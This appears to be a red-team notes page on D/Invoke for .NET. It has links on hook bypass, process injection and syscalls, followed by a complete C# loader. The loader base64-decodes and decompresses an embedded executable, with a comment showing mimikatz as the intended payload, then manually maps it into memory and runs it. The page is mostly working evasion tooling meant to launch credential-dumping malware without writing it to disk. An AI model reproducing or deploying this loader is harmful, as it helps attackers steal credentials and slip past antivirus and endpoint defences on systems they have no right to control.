D/Invoke

Dynamic API Invocation
​https://dinvoke.net/​
​https://thewover.github.io/Dynamic-Invoke/​
​https://github.com/TheWover/DInvoke​
​https://web.archive.org/web/20210601171512/https://rastamouse.me/blog/process-injection-dinvoke/​
​https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/Dinvoke_CreateRemoteThread.cs​
​https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/​
​https://offensivedefence.co.uk/posts/dinvoke-syscalls/​
Dynamic P/Invoke
​https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/​
​https://github.com/bohops/DynamicDotNet​
H/Invoke & NixImports
​https://dr4k0nia.github.io/posts/HInvoke-and-avoiding-PInvoke/​
​https://gist.github.com/dr4k0nia/95bd2dc1cc09726f4aaaf920b9982f9d​
​https://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/​
​https://github.com/dr4k0nia/NixImports​
Run PE From Memory
​https://github.com/S3cur3Th1sSh1t/Creds/blob/master/Csharp/PE_Loader_DInvoke_ManualMap.cs​
DInvokePE.cs
using System;
using System.IO;
using System.IO.Compression;
​
namespace DInvokePE
{
    public class Program
    {
        static byte[] Compress(byte[] data)
        {
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(output, CompressionLevel.Optimal))
                dStream.Write(data, 0, data.Length);
​
            return output.ToArray();
        }
​
        static byte[] Decompress(byte[] data)
        {
            var input = new MemoryStream(data);
            var output = new MemoryStream();
            using (var dStream = new DeflateStream(input, CompressionMode.Decompress))
                dStream.CopyTo(output);
​
            return output.ToArray();
        }
​
        public static void Main(string[] args)
        {
            /*
            var rawBytes = File.ReadAllBytes(@"C:\Users\snovvcrash\Desktop\mimikatz.exe");
            var compressed = Compress(rawBytes);
            var compressedB64 = Convert.ToBase64String(compressed);
            Console.WriteLine(compressedB64);
            */
​
            var compressed = Convert.FromBase64String("");
            var rawBytes = Decompress(compressed);
            var map = DInvoke.ManualMap.Map.MapModuleToMemory(rawBytes);
            DInvoke.DynamicInvoke.Generic.CallMappedPEModule(map.PEINFO, map.ModuleBase);
            Console.ReadLine();
        }
    }
}
Last modified 3mo ago